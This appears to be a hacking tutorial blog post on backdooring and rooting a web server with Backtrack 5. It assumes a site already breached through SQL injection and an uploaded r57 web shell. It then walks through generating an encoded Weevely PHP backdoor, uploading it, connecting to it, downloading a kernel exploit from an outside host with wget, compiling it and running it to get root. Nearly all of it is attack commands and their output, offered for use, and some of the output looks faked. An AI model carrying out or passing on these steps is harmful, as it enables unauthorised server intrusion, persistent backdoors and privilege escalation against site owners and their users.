BackDoor & Rooting With Backtrack 5

Today Im going to post a tutorial Related to Backdoor Via Backtrack 5.
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)

Admin pAnel: http://target.com/admin/index.php

After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php

now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!


root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/


Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file


root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p shadow008

+ Backdoor file ‘bdoor.php ’ created with password ‘shadow008".
Now go and check your desktop. There will be a encrypted php file bdoor.php .

=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location

Now we have to connect to our encrypted bdoor.php

root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p shadow008

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .

[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.


[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!

[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp

Directory pcp Successfully Created.


[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a

Linux 2.6.32 kernel (Assume)

[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c

[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.

[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-

[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!
Well using exploits depend upon the kernel you have .. Different versions have different exploits!! you need to get the exploit . compile it !! and execute it..

Categories: